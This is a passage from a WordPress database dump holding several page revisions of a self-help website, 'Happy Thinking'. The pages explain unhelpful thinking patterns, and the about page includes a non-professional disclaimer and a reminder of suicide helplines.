(2080, 1, '2023-08-09 18:45:14', '2023-08-09 18:45:14', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>You can contact me via this email:  web21@freshgasflow.com     Please mention "Happy Thinking" in the subject line. Thank you. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Before we proceed, it is important that you get to know a bit about who I am (and who I am not!). Your mind is very precious and I would like you to know something about me before you trust me.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I must emphasise to you that I am not a mental health professional and I do not have formal qualifications in the subject. So, please take the information on this website at your own risk (please read the disclaimer section of this website for more details).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Now you may ask, â€œWhat qualifies me to run this website?â€ Well, perhaps like yourself, I too have been pondering about how to be happy. In my life, I have faced various challenges that have kept my mind often in an unhappy state. Over the years, I have thought about this issue and wondered if I could come up with a practical and easy-to-understand way of dealing with it.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I soon realised that the way oneâ€™s mind â€œthinksâ€, can play an important role if one is happy or not. When faced with challenges, I noticed that there seemed to be certain unhelpful ways of thinking that my mind did that caused me to be unhappy. I then thought that maybe an idea would be to deal with the issue like an engineer would deal with a faulty machine: i.e. recognise unhelpful ways of thinking and use tools to fix such thinking. So over the years, I learnt about the various unhelpful ways of thinking that oneâ€™s mind may do and then researched and experimented with various mental techniques (i.e. tools) that I could use to deal with such thinking. Having benefited from these techniques greatly, I felt that I should share such insights with others. I, therefore, made this website to fulfil this desire of sharing, with the hope that it will benefit many.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When reading the many â€œself-helpâ€ books and other resources out there, I often found them to be either too vague or too complex to be of practical value in my day to life. In view of this, my number one focus for this website was to make it easy to understand and give solutions that one can realistically use in oneâ€™s daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I also would like to stress that it is very important that if you are being cared for by a mental health professional, under no circumstances should you change your thinking or medication, without their approval. They are trained individuals unlike me, and also, suddenly changing medication can be very dangerous. On the other hand, please do share this website with them and please let me know what they think of it! Also, unfortunately, suicide is a very real risk in some and if you feel in any way inclined to do so, please contact professional helplines in your country and also seek out friends and family. Things may feel very low, but once someone lifts you up a bit, you will realise that there is hope.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So while I would like to make it clear that this website does not provide professional advice, I hope that you will assess the simple ideas I will present to you and if you find them sensible, use them in your life to make yourself a happier person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I have kept this website free so that everyone can benefit. However, if you are able to make a small donation equal to about a dollar, I would be very grateful if you would do so by clicking <a href="https://www.happythinking.com/donate/">HERE</a>.Â You will be then taken to a donate page. Every little bit will help me develop this website. Thank you. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim is for you to be happy and I am confident that the material on this website will help you to think in ways that will make you happy (i.e. Happy Thinking!).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->', 'About me', '', 'inherit', 'closed', 'closed', '', '466-revision-v1', '', '', '2023-08-09 18:45:14', '2023-08-09 18:45:14', '', 466, 'https://www.happythinking.com/?p=2080', 0, 'revision', '', 0),
(2116, 1, '2024-01-10 14:22:06', '2024-01-10 14:22:06', '<!-- wp:paragraph -->\n<p>I am sure that you have a desire to be happy. After all, that is probably why you are visiting this website with the name â€œHappy Thinkingâ€! Unfortunately, as you know, the world you and I live in is full of stress and problems, which at times can make it challenging to find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2038,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unhappycloudsface_21_7_2023.jpg" alt="" class="wp-image-2038"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>However, while you may not be able to always control the things happening around you, one thing you can control is how your mind â€œthinksâ€. The â€œway you thinkâ€ can determine if the problems you face make you remain happy or become unhappy. The ultimate goal of happy thinking is to help you to think in ways that allow you to be happy despite the problems around you.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>To better understand how â€œthe way one thinksâ€ can affect oneâ€™s happiness, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2039,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/two_unhappy_faces_21_7_2023.jpg" alt="" class="wp-image-2039"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>However, when facing this stressful situation, letâ€™s imagine that the two people think differently to each other.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of them might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job. This type of thinking helps the person be as happy as possible given the circumstances, and is what I would call, â€œhelpful thinkingâ€.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was unhelpful as it made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult. This type of thinking just made the person feel worse and less able to solve his problems, and is what I call, â€unhelpful thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Despite facing the same stress, one personâ€™s way of thinking made him or her remain happy while the other personâ€™s way of thinking made that person unhappy. Two different outcomes, just by thinking differently.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2040,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/one_unhappy_faces_21_7_2023.jpg" alt="" class="wp-image-2040"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Over your life, you may have developed unhelpful ways of thinking that can unnecessarily cause you to have an unhappy mental state. Such â€œunhelpful thinkingâ€ can create problems when none exists or if there are real problems, may make them negatively affect you more than they should (like in the example we just described). You may have developed the habit of thinking in such unhelpful ways so gradually that you may not even realise that you are thinking in such ways. Happy thinking is about changing unhelpful thinking, and the first step is to be able to recognise when such thinking occurs in yourself. If you are not able to recognise unhelpful thinking, how can you change it? Therefore, to help you to recognise when unhelpful thinking happens to you, in this website I will describe, in an easy-to-understand way, common types of unhelpful thinking that people do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Of course, once you recognise unhelpful thinking, you will want to change such thinking. To help you with this, I will describe various methods that you can use to change unhelpful thinking. These methods are very practical and you will be able to use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to helping you to recognise and change unhelpful thinking, I will also share with you bits of wisdom about happiness that I have collected from various places. Wisdom can help one to see the world with a different and happier viewpoint. All these ingredients together make Happy Thinking, which will help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the next pages (i.e. first part of this website), I will explain to you in an easy-to-understand way, common types of unhelpful thinking that people do. As you learn about the common types of unhelpful thinking, see which ones apply to you and feel free to skim over the ones that seem to be not relevant to you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1883,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/patternrecognition170623a.gif" alt="" class="wp-image-1883"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Please note that in the first section of this website, I will not mention any of the methods that you can use to deal with unhelpful thinking. Those I will share with you after you understand the various types of unhelpful thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finally do not try to understand and remember every type of unhelpful thinking in one go. A lot of people think that by speed reading and clicking through pages, they would miraculously end up becoming happier. Unfortunately, by going too fast, the information will just bounce off oneâ€™s mind, rather than interacting with it.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2041,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/shape_bounce_21_7_23.jpg" alt="" class="wp-image-2041"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Like lots of things, you need to go slow so that you can appreciate and digest knowledge. This website will always be there for you, so take as long as you like to read it. You are always welcome to keep visiting here.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Letâ€™s move on to understand common types of unhelpful thinking. Letâ€™s see how many will be relevant to you! In my case, I could recognise many of them in my own mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2024-01-10 14:22:06', '2024-01-10 14:22:06', '', 1034, 'https://www.happythinking.com/?p=2116', 0, 'revision', '', 0),
(2085, 1, '2023-08-12 17:42:56', '2023-08-12 17:42:56', '<!-- wp:paragraph -->\n<p>I am sure that you have a desire to be happy. After all, that is probably why you are visiting this website with the name â€œHappy Thinkingâ€! Unfortunately, as you know, the world you and I live in is full of stress and problems, which at times can make it challenging to find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2038,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unhappycloudsface_21_7_2023.jpg" alt="" class="wp-image-2038"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>However, while you may not be able to always control the things happening around you, one thing you can control is how your mind â€œthinksâ€. The â€œway you thinkâ€ can determine if the problems you face make you remain happy or become unhappy. The ultimate goal of happy thinking is to help you to think in ways that allow you to be happy despite the problems around you.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>To better understand how â€œthe way one thinksâ€ can affect oneâ€™s happiness, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2039,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/two_unhappy_faces_21_7_2023.jpg" alt="" class="wp-image-2039"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>However, when facing this stressful situation, letâ€™s imagine that the two people think differently to each other.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of them might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job. This type of thinking helps the person be as happy as possible given the circumstances, and is what I would call, â€œhelpful thinkingâ€.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was unhelpful as it made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult. This type of thinking just made the person feel worse and less able to solve his problems, and is what I call, â€unhelpful thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Despite facing the same stress, one personâ€™s way of thinking made him or her remain happy while the other personâ€™s way of thinking made that person unhappy. Two different outcomes, just by thinking differently.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2040,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/one_unhappy_faces_21_7_2023.jpg" alt="" class="wp-image-2040"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Over your life, you may have developed unhelpful ways of thinking that can unnecessarily cause you to have an unhappy mental state. Such â€œunhelpful thinkingâ€ can create problems when none exists or if there are real problems, may make them negatively affect you more than they should (like in the example we just described). You may have developed the habit of thinking in such unhelpful ways so gradually that you may not even realise that you are thinking in such ways. Happy thinking is about changing unhelpful thinking, and the first step is to be able to recognise when such thinking occurs in yourself. If you are not able to recognise unhelpful thinking, how can you change it? Therefore, to help you to recognise when unhelpful thinking happens to you, in this website I will describe, in an easy-to-understand way, common types of unhelpful thinking that people do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Of course, once you recognise unhelpful thinking, you will want to change such thinking. To help you with this, I will describe various mental tools that you can use to change unhelpful thinking. Just like a repairman will use various tools to repair something, you will be able to use these tools to change your unhelpful thinking. These â€œtoolsâ€ are very practical and you will be able to use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to helping you to recognise and change unhelpful thinking, I will also share with you bits of wisdom about happiness that I have collected from various places. Wisdom can help one to see the world with a different and happier viewpoint. All these ingredients together make Happy Thinking, which will help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the next pages (i.e. first part of this website), I will explain to you in an easy-to-understand way, common types of unhelpful thinking that people do. As you learn about the common types of unhelpful thinking, see which ones apply to you and feel free to skim over the ones that seem to be not relevant to you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1883,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/patternrecognition170623a.gif" alt="" class="wp-image-1883"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Please note that in the first section of this website, I will not mention any of the mental tools that you can use to deal with unhelpful thinking. Those I will share with you after you understand the various types of unhelpful thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finally do not try to understand and remember every type of unhelpful thinking in one go. A lot of people think that by speed reading and clicking through pages, they would miraculously end up becoming happier. Unfortunately, by going too fast, the information will just bounce off oneâ€™s mind, rather than interacting with it.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2041,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/shape_bounce_21_7_23.jpg" alt="" class="wp-image-2041"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Like lots of things, you need to go slow so that you can appreciate and digest knowledge. This website will always be there for you, so take as long as you like to read it. You are always welcome to keep visiting here.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Letâ€™s move on to understand common types of unhelpful thinking. Letâ€™s see how many will be relevant to you! In my case, I could recognise many of them in my own mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-08-12 17:42:56', '2023-08-12 17:42:56', '', 1034, 'https://www.happythinking.com/?p=2085', 0, 'revision', '', 0),
(2090, 1, '2023-11-15 08:15:33', '2023-11-15 08:15:33', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2059,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking080723.jpg" alt="" class="wp-image-2059"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:spacer {"height":"25px"} -->\n<div style="height:25px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This free website will share with you the concept of â€œHappy Thinkingâ€ which can help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may have developed certain ways of thinking that are not helpful to oneâ€™s mental well-being. Such â€œnegativeâ€ ways of thinking are very common and can happen to anyone. One may not even realise that one is thinking in such ways.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you are to achieve the best possible happiness in your life, it is important to recognise and change negative ways of thinking when it happens to you. On this free website, I will describe to you the common types of negative thinking that people do. This will help you to recognise negative thinking when it happens to you. I will also explain to you various mental tools that you can use to deal with negative thinking. Such mental tools will be very practical so that you will be able to use them in your daily life. As you change negative ways of thinking you will find yourself becoming happier.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to describing types of negative thinking and giving tools to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These three ingredients, i.e. recognising negative thinking, using mental tools to deal with it and using wisdom to see the world differently, together make the concept of â€œHappy Thinkingâ€. I am confident that practising happy thinking will help you to find happiness in your life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2054,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cauldron_060823.jpg" alt="" class="wp-image-2054"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>This website on happy thinking is truly free for you (and your family and friends!) to benefit from. There is nothing to buy, download, register or any other sales tactics. All I wish is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-11-15 08:15:33', '2023-11-15 08:15:33', '', 88, 'https://www.happythinking.com/?p=2090', 0, 'revision', '', 0),
(2110, 1, '2023-12-30 17:30:23', '2023-12-30 17:30:23', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2059,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking080723.jpg" alt="" class="wp-image-2059"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:spacer {"height":"25px"} -->\n<div style="height:25px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This free website will share with you the concept of â€œHappy Thinkingâ€ which can help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may have developed certain ways of thinking that are not helpful to oneâ€™s mental well-being. Such â€œnegativeâ€ ways of thinking are very common and can happen to anyone. One may not even realise that one is thinking in such ways.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you are to achieve the best possible happiness in your life, it is important to recognise and change negative ways of thinking when it happens to you. On this free website, I will describe to you the common types of negative thinking that people do. This will help you to recognise negative thinking when it happens to you. I will also explain to you various mental tools that you can use to deal with negative thinking. Such mental tools will be very practical so that you will be able to use them in your daily life. As you change negative ways of thinking you will find yourself becoming happier.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to describing types of negative thinking and giving tools to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These three ingredients, i.e. recognising negative thinking, using mental tools to deal with it and using wisdom to see the world differently, together make the concept of â€œHappy Thinkingâ€. I am confident that practising happy thinking will help you to find happiness in your life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2054,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cauldron_060823.jpg" alt="" class="wp-image-2054"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>This website on happy thinking is truly free for you (and your family and friends!) to benefit from. There is nothing to buy, download, register or any other sales tactics. All I wish is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'How to be happy explained', '', 'publish', 'closed', 'closed', '', 'howtobehappyexplained', '', '', '2024-01-28 16:19:34', '2024-01-28 16:19:34', '', 0, 'https://www.happythinking.com/?page_id=2110', 0, 'page', '', 0);
INSERT INTO `wpou_posts` VALUES
(2111, 1, '2023-12-30 17:30:23', '2023-12-30 17:30:23', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2059,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking080723.jpg" alt="" class="wp-image-2059"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:spacer {"height":"25px"} -->\n<div style="height:25px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This free website will share with you the concept of â€œHappy Thinkingâ€ which can help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may have developed certain ways of thinking that are not helpful to oneâ€™s mental well-being. Such â€œnegativeâ€ ways of thinking are very common and can happen to anyone. One may not even realise that one is thinking in such ways.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you are to achieve the best possible happiness in your life, it is important to recognise and change negative ways of thinking when it happens to you. On this free website, I will describe to you the common types of negative thinking that people do. This will help you to recognise negative thinking when it happens to you. I will also explain to you various mental tools that you can use to deal with negative thinking. Such mental tools will be very practical so that you will be able to use them in your daily life. As you change negative ways of thinking you will find yourself becoming happier.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to describing types of negative thinking and giving tools to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These three ingredients, i.e. recognising negative thinking, using mental tools to deal with it and using wisdom to see the world differently, together make the concept of â€œHappy Thinkingâ€. I am confident that practising happy thinking will help you to find happiness in your life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image 